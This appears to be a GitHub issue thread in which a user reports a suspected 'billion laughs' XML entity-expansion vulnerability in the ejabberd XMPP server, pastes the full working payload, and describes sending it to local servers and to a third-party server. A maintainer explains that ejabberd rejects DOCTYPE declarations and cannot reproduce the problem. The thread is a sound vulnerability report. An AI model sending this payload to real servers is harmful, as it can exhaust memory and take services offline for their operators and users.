XML vulnerability

[nathan130200]

I think ejabberd may be the target of a critical vulnerability. The famous "attack of billions of laughs".

https://en.wikipedia.org/wiki/Billion_laughs_attack

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

When an XML parser loads this document, it sees that it includes one root element, "lolz", that contains the text "&lol9;". However, "&lol9;" is a defined entity that expands to a string containing ten "&lol8;" strings. Each "&lol8;" string is a defined entity that expands to ten "&lol7;" strings, and so on. After all the entity expansions have been processed, this small (< 1 KB) block of XML will actually contain 109 = a billion "lol"s, taking up almost 3 gigabytes of memory.

I tested on some local servers with ejabberd. I sent the same XML document and noticed that the server stopped responding infinitely, unless I restarted it.

Consider using expat... Furthermore, it doesn't even make sense to process DTD entities, as it is not part of the XMPP protocol.

I would like you to carry out the tests and confirm if you can also reproduce this or if it was just an isolated case/bad luck.

[prefiks]

Did you sent that to port 5222, or used something else? We are using expat, and we terminate stream when we receive DOCTYPE in it, so we shouldn't be vulnerable to this (and i see that it works like that on my server).

[nathan130200]

Yes, i've sent to port 5222. The server just freeze for some minutes. I did an test with other 3rd party external server using ejabberd same happened. Maybe was bad luck

[prefiks]

Can't reproduce it here, and looking at our code, part that reject <DOCTYPE declarations is there for like decade.

[nathan130200]

Fortunately. So I believe I just had bad luck or maybe it was a connection drop. I sent it again to the external server, now it returns as expected.